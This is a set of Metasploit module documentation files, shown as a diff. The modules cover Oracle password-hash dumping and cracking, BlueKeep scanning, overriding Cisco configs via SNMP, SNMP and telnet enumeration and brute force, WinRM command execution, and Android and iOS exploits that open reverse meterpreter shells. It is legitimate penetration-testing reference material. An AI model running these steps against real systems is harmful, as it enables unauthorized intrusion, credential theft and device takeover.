+  3. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]` command. If `tnsping` is not in your path upon installation, you will have to locate it manually.
+     * On a Windows machine, for Oracle 11g, `tnsping.exe` is located at: `oracle_install\app\oracle\product\<version, ie 11.2.0)\server\bin\tnsping.exe`.
+     * On a Windows machine, for Oracle 12c and 18c, it is located at `%ORACLE_HOME%\bin\tnsping.exe`.
+
+     After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
+
+    ```
+    C:> tnsping staticdb
+    ...
+    
+    Used TNSNAMES adapter to resolve the alias
+    Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
+    OK (0 msec)
+    ```
+
+    If `tnsping` fails, make sure the listener is setup correctly.
+    See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration. 
+
+  4. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
+  5. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
+    * 12c: `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'`
+    * pre-12c: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
+  6. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client.
+     [View the setup tutorial here](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux)
+  7. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: ```use auxiliary/scanner/oracle/oracle_hashdump.rb```
+  3. Do: ```run```
+  4. If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
+  5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
+
+## Options
+
+  **DBPASS**
+  The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
+
+  **DBUSER**
+  The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
+
+  **RPORT**
+  The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
+
+  **SID**
+  The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation).
+  Default is `ORCL` (default Oracle install value) or `XE` for free edition.
+
+## Scenarios
+
+### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
+Module options (auxiliary/scanner/oracle/oracle_hashdump):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   DBPASS   hunter2          yes       The password to authenticate with.
+   DBUSER   scott            yes       The username to authenticate with.
+   RHOST    127.0.0.1        yes       The Oracle host.
+   RHOSTS   127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT    1522             yes       The TNS port.
+   SID      staticdb         yes       The sid to authenticate with.
+   THREADS  1                yes       The number of concurrent threads
+
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running 12c
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username               Hash
+ --------               ----
+ ...
+ SCOTT                  S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
+ ...
+ 
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
+Credentials
+===========
+
+host       origin     service            public  private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----       ------     -------            ------  -------      
+...                                                                                                                                                                                                                                                         -----  ------------        ----------
+127.0.0.1  127.0.0.1  1522/tcp (oracle)  SCOTT   S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699         Nonreplayable hash  oracle12c
+```
+
+These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)).
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+...
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] SCOTT:hunter2
+...
+```
+### Oracle 18c (18.4 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+resource (oracle.rb)> run
+[-] Version 18c is not currently supported
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Oracle 11g (11.2 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
+verbose => true
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running version 11g
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username          Hash
+ --------          ----
+ APEX_040000       S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
+ APEX_PUBLIC_USER  S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
+ APPQOSSYS         S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
+ CTXSYS            S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
+ DBSNMP            S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
+ DIP               S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
+ FLOWS_FILES       S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
+ HR                S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
+ MDSYS             S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
+ ORACLE_OCM        S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
+ OUTLN             S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
+ SYS               S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
+ SYSTEM            S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
+ XDB               S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
+ XS$NULL           S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
+
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,79 @@
+[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) ("BlueKeep")  may allow an unauthenticated attacker to gain remote code execution on an unpatched Microsoft Windows workstation or server exposing the [Remote Desktop Protocol (RDP)](https://docs.microsoft.com/en-us/windows/desktop/termserv/remote-desktop-protocol).  As a result, the vulnerability has the maximum CVSS score of 10.0.
+
+The vulnerability exists and been patched in workstation editions of Windows XP, Windows Vista, and Windows 7.  Server releases of Windows are also affected and have been patched: Windows 2003, Windows 2008 and Windows 2008 R2.
+
+This module, `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`, scans all versions of Windows, reporting back the vulnerable state of one or more targets.  The vulnerability is not known to exist in versions of Windows 8 (or above) or Windows 2012 (or above).  However, the scanner can safely be used against all Windows versions without effect on the RDP service or clients.
+
+## Vulnerable Application
+
+Remote Desktop Protocol (RDP), also known as Terminal Services, allows authenticated users to remotely administer Windows workstations and servers.  RDP is common in enterprise networks, as it allows IT administrators and users alike to conveniently work remotely.  Additionally, RDP is not uncommon to see exposed to the Internet, sometimes on its default port of TCP/3389.
+
+RDP is supported on Windows platforms from Windows XP through all modern versions of Windows.  Newer versions of Windows (XP SP3+, Vista, and up) support Network Level Authentication (NLA), which provides enhanced authentication and mitigates some RDP-based attacks.
+
+## Verification Steps
+
+  1. Set up a Windows target (XP, Vista, 7, 2003, 2008, 2008 R2).
+  2. Start msfconsole.
+  3. Load the module: `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep`
+  4. Specify the IP address of one or more targets: `set RHOSTS 192.168.1.1-5`
+  5. Optionally, change the target port from the default of `3389`: `set RPORT 31337`
+  6. Launch the scanner: `run`
+
+## Scenarios
+
+#### A vulnerable version and configuration of Microsoft Windows
+If the target has RDP accessible with NLP disabled, and is running a vulnerable version of Windows (XP, 7, 2003, 2008, 2008 R2) without a [patch](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708), it will return a Vulnerable status:
+
+```
+[+] 192.168.1.2:3389  - The target is vulnerable.
+[*] 192.168.1.2:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A patched or NLP-enabled configuration of Microsoft Windows
+If the target has RDP accessible, but is not vulnerable for one or more reasons, it may have NLP enabled or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a patched or NLP-enabled target will return:
+
+```
+[*] 192.168.1.3:3389  - The target is not exploitable.
+[*] 192.168.1.3:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A non-vulnerable version of Microsoft Windows
+If the target has RDP accessible, but is a newer, non-vulnerable version of Windows (8, 10, 2012, 2016), or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a non-vulnerable target will return:
+
+```
+[*] 192.168.1.4:3389  - The target is not exploitable.
+[*] 192.168.1.4:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A host without RDP enabled
+A non-Windows target, or a Windows target with RDP disabled or firewalled, will report failure to connect:
+
+```
+[*] 192.168.220.1:3389    - The target service is not running, or refused our connection.
+[*] 192.168.220.1:3389    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Testing
+
+This scanner module has been tested against a variety of Windows hosts, ranging from Windows XP through Windows 2016.  During testing, no adverse effects or logging was identified on release builds.  (Note: Debug/checked builds exhibited crashes, but these should not be found in production environments.)
+
+Workstation versions:
+ - Windows XP SP2 (x86), SP3 (x86), Version 2003 (x64)
+ - Windows Vista SP0 (x86), SP0 (x64), SP2 (x64)
+ - Windows 7 SP1 (x86), SP1 (x64)
+ - Windows 10 1709, 1809 (x64)
+
+Server versions:
+ - Windows 2000 SP4 (x86)
+ - Windows 2003 SP0 (x86), SP1 (x86), SP1 (x64), SP2 (x86), R2 SP1 (x86), R2 SP2 (x86)
+ - Windows 2008 SP0 (x64), SP1 (x86), R2 SP1 (x64)
+ - Windows 2012 R2 (x64)
+ - Windows 2016 Build 1607 (x64)
+
+### Questions?  Issues?
+
+If you encounter issues with the module, consider reaching out to the developers and user community [using Slack](https://www.metasploit.com/slack).  If you encounter crashing on any targets, please consider [opening a issue](https://github.com/rapid7/metasploit-framework/issues/new).
@@ -3,18 +3,36 @@
  Cisco IOS devices can be configured to retrieve, via tftp,  a file via SNMP.
  This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
  feature of IOS and many other networking devices, and is part of an administrator functionality.
+  This functionality can also be used to change their running configuration. This is documented [here](https://www.ciscozine.com/send-cisco-commands-via-snmp/). 
  A read-write community string is required, as well as a tftp server (metasploit includes one).
-  The file will be saved to `flash:`.
+  The default functionality of the module will upload the file and it will be saved to `flash:`.
+  The `Override_Config` action will override the running configuration of the device and the file will not be saved.

 ## Verification Steps

+Upload_File (Default Action)
+
  1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
  4. Do: ```set COMMUNITY [read-write snmp]```
-  5. Do: ```set rhosts [ip]```
-  6. Do: ```set source [file]```
-  7. Do: ```run```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```run```
+  
+Override_Config
+
+  1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
+  4. Do: ```set COMMUNITY [read-write snmp]```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```set action [Override_Config]```
+  9. Do: ```run```
+  10. You can **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.

 ## Options

@@ -47,3 +65,27 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
 [*] Shutting down the TFTP service...
 [*] Auxiliary module execution completed
 ```
+### Cisco 3560G switch running IOS 12.2
+
+```
+
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
+`COMMUNITY => private`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
+`LHOST => 10.20.164.164`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
+`action => Override_Config`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
+`rhosts => 10.20.205.5`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
+`source => /root/Desktop/newconfig`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`
+
+`[*] Starting TFTP server...`
+`[*] Copying file newconfig to 10.20.205.5...`
+`[*] Scanned 1 of 1 hosts (100% complete)`
+`[*] Providing some time for transfers to complete...`
+`[*] Shutting down the TFTP service...`
+`[*] Auxiliary module execution completed`
+
+```
@@ -0,0 +1,78 @@
+## Description
+This module performs a detailed enumeration of a host or a range through SNMP protocol. It supports hardware, software, and network information.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Scenarios 
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enum
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) > set RHOSTS 1.1.1.2
+RHOSTS => 1.1.1.2
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) > run
+
+[*] System information
+
+Hostname                : Netgear-GSM7224
+Description             : GSM7224 L2 Managed Gigabit Switch
+Contact                 : dookie
+Location                : Basement
+Uptime snmp             : 56 days, 00:36:28.00
+Uptime system           : -
+System date             : -
+
+[*] Network information
+
+IP forwarding enabled   :  no
+Default TTL             :  64
+TCP segments received   :  20782
+TCP segments sent       :  9973
+TCP segments retrans.   :  9973
+Input datagrams         :  4052407
+Delivered datagrams     :  1155615
+Output datagrams        :  18261
+
+[*] Network interfaces
+
+Interface [ up ] Unit: 1 Slot: 0 Port: 1 Gigabit - Level
+
+	Id              : 1
+	Mac address     : 00:0f:b5:fc:bd:24
+	Type            : ethernet-csmacd
+	Speed           : 1000 Mbps
+	Mtu             : 1500
+	In octets       : 3716564861
+	Out octets      : 675201778
+...snip...
+[*] Routing information
+
+     Destination         Next hop             Mask           Metric
+
+         0.0.0.0      5.1.168.192          0.0.0.0                1
+       1.0.0.127        1.0.0.127  255.255.255.255                0
+
+[*] TCP connections and listening ports
+
+   Local address       Local port   Remote address      Remote port            State
+
+         0.0.0.0               23          0.0.0.0                0           listen
+         0.0.0.0               80          0.0.0.0                0           listen
+         0.0.0.0             4242          0.0.0.0                0           listen
+       1.0.0.127             2222          0.0.0.0                0           listen
+
+[*] Listening UDP ports
+
+   Local address       Local port
+
+         0.0.0.0                0
+         0.0.0.0              161
+         0.0.0.0              514
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) >
+```
@@ -0,0 +1,32 @@
+## Description
+This module will simply scan a range of hosts and queries via SNMP to determine any available shares.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enumshares```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enumshares
+msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 1.1.1.200-211
+RHOSTS => 1.1.1.200-211
+msf auxiliary(scanner/snmp/snmp_enumshares) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/snmp/snmp_enumshares) > run 
+
+[+] 1.1.1.201 
+	shared_docs -  (C:\Documents and Settings\Administrator\Desktop\shared_docs)
+[*] Scanned 02 of 11 hosts (018% complete)
+[*] Scanned 03 of 11 hosts (027% complete)
+[*] Scanned 05 of 11 hosts (045% complete)
+[*] Scanned 07 of 11 hosts (063% complete)
+[*] Scanned 09 of 11 hosts (081% complete)
+[*] Scanned 11 of 11 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/snmp/snmp_enumshares) > 
+```
+
@@ -0,0 +1,33 @@
+## Description
+This module queries a range of hosts via SNMP and gathers a list of usernames on the remote system.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enumusers```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [NUMBER OF THREADS]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enumusers
+msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 1.1.1.200-211
+RHOSTS => 1.1.1.200-211
+msf auxiliary(scanner/snmp/snmp_enumusers) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/snmp/snmp_enumusers) > run 
+
+[+] 1.1.1.201 Found Users: ASPNET, Administrator, Guest, HelpAssistant, SUPPORT_388945a0, victim 
+[*] Scanned 02 of 12 hosts (016% complete)
+[*] Scanned 05 of 12 hosts (041% complete)
+[*] Scanned 06 of 12 hosts (050% complete)
+[*] Scanned 07 of 12 hosts (058% complete)
+[*] Scanned 08 of 12 hosts (066% complete)
+[*] Scanned 09 of 12 hosts (075% complete)
+[*] Scanned 11 of 12 hosts (091% complete)
+[*] Scanned 12 of 12 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/snmp/snmp_enumusers) >
+```
+
@@ -0,0 +1,74 @@
+## Description
+This module will test a telnet login with a list of provided credentials on a range of machines and report successful logins. It allows you to pass credentials in a number of ways. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/telnet_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [NUMBER OF THREADS]```
+4. Do: ```set USER_FILE [USERNAME FILE]```
+5. Do: ```set PASS_FILE [PASSWORD FILE]```
+6. Do: ```run```
+
+## Options
+
+
+### BLANK PASSWORD 
+
+When set to `true`, it'll bruteforce with blank passwords for all users. Default value is `false`.
+
+### USERNAME
+
+Only one username to authenticate with.
+
+### PASSWORD
+
+Only one password to authenticate with. 
+
+### USERPASS_FILE 
+
+File containing username and passwords separated by space, one pair one line.
+
+### USER_FILE
+
+File containing usernames one per line.
+
+### PASS_FILE
+
+File containing passwords one per line.
+
+
+## Scenarios 
+
+In this scan we have provided list of username and passwords files separately. 
+
+```
+msf > use use auxiliary/scanner/telnet/telnet_login
+msf auxiliary(scanner/telnet/telnet_login) > set RHOSTS 1.1.1.0/24
+RHOSTS => 1.1.1.0/24
+msf auxiliary(scanner/telnet/telnet_login) > set THREADS 254
+THREADS => 254
+msf auxiliary(scanner/telnet/telnet_login) > set BLANK_PASSWORDS false
+BLANK_PASSWORDS => false
+msf auxiliary(scanner/telnet/telnet_login) > set USER_FILE users.txt
+USER_FILE => users.txt
+msf auxiliary(scanner/telnet/telnet_login) > set PASS_FILE passwords.txt
+PASS_FILE => passwords.txt
+msf auxiliary(scanner/telnet/telnet_login) > set VERBOSE false
+VERBOSE => false
+msf auxiliary(scanner/telnet/telnet_login) > run
+
+[+] 1.1.1.116 - SUCCESSFUL LOGIN root : s00p3rs3ckret
+[*] Command shell session 1 opened (1.1.1.101:50017 -> 1.1.1.116:23) at 2010-10-08 06:48:27 -0600
+[+] 1.1.1.116 - SUCCESSFUL LOGIN admin : s00p3rs3ckret
+[*] Command shell session 2 opened (1.1.1.101:41828 -> 1.1.1.116:23) at 2010-10-08 06:48:28 -0600
+[*] Scanned 243 of 256 hosts (094% complete)
+[+] 1.1.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin
+[*] Command shell session 3 opened (1.1.1.101:49210 -> 1.1.1.56:23) at 2010-10-08 06:49:07 -0600
+[*] Scanned 248 of 256 hosts (096% complete)
+[*] Scanned 250 of 256 hosts (097% complete)
+[*] Scanned 255 of 256 hosts (099% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/telnet/telnet_login) >
+```
@@ -0,0 +1,31 @@
+## Description
+This module will scan a range of machines and prints the banner, usually containing the version of any telnet servers that are running on it.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/telnet_version```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/telnet/telnet_version 
+msf auxiliary(scanner/telnet/telnet_version) > set RHOSTS 1.1.1.0/24
+RHOSTS => 1.1.1.0/24
+msf auxiliary(scanner/telnet/telnet_version) > set THREADS 254
+THREADS => 254
+msf auxiliary(scanner/telnet/telnet_version) > run
+
+[*] 1.1.1.2:23 TELNET (GSM7224) \x0aUser:
+[*] 1.1.1.56:23 TELNET Ubuntu 8.04\x0ametasploitable login:
+[*] 1.1.1.116:23 TELNET Welcome to GoodTech Systems Telnet Server for Windows NT/2000/XP (Evaluation Copy)\x0a\x0a(C) Copyright 1996-2002 GoodTech Systems, Inc.\x0a\x0a\x0aLogin username:
+[*] Scanned 254 of 256 hosts (099% complete)
+[*] Scanned 255 of 256 hosts (099% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/telnet/telnet_version) >
+```
+
+
@@ -0,0 +1,23 @@
+## Description
+This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/winrm/winrm_auth_methods```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/winrm/winrm_auth_methods
+msf auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 1.1.1.10
+RHOSTS => 1.1.1.10
+msf auxiliary(scanner/winrm/winrm_auth_methods) > run 
+
+[+] 1.1.1.10:5985: Negotiate protocol supported
+[+] 1.1.1.10:5985: Basic protocol supported
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/winrm/winrm_auth_methods) >
+```
@@ -0,0 +1,34 @@
+## Description
+This module runs arbitrary Windows commands using the WinRM Service. It needs login credentials to do so.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/winrm/winrm_cmd```
+2. Do: ```set CMD [WINDOWS COMMAND]```
+3. Do: ```set RHOSTS [IP]```
+4. Do: ```set USERNAME [USERNAME]```
+5. Do: ```set PASSWORD [PASSWORD]```
+6. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/winrm/winrm_cmd
+msf auxiliary(scanner/winrm/winrm_cmd) > set CMD hostname
+CMD => hostname
+msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 1.1.1.10
+RHOSTS => 1.1.1.10
+msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
+USERNAME => Administrator
+msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD vagrant 
+PASSWORD => vagrant
+msf auxiliary(scanner/winrm/winrm_cmd) > run 
+
+[+] vagrant-2008R2
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+msf auxiliary(scanner/winrm/winrm_cmd) > 
+```
+
@@ -0,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt 
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+
@@ -0,0 +1,55 @@
+## Description
+
+This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233).  
+
+The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object.  This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript.  The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution.  
+
+The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.
+
+## Vulnerable Application
+
+The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 up to iOS 11.2.
+
+## Verification Steps
+
+ * Start msfconsole
+ * `use exploit/apple_ios/browser/webkit_createthis`
+ * `set LHOST` and `SRVHOST` as appropriate
+ * exploit
+ * Browse to the given URL with a vulnerable device from Safari
+ * Note that the payload is specially created for this exploit, due to sandbox
+   limitations that prevent spawning new processes.
+
+## Scenarios
+
+### 64bit iPhone 5S running iOS 10.2.1
+
+```
+msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
+[*] Started reverse TCP handler on 192.168.1.51:4444 
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.1.51:8080/
+[*] Server started.
+[*] 192.168.1.34     webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
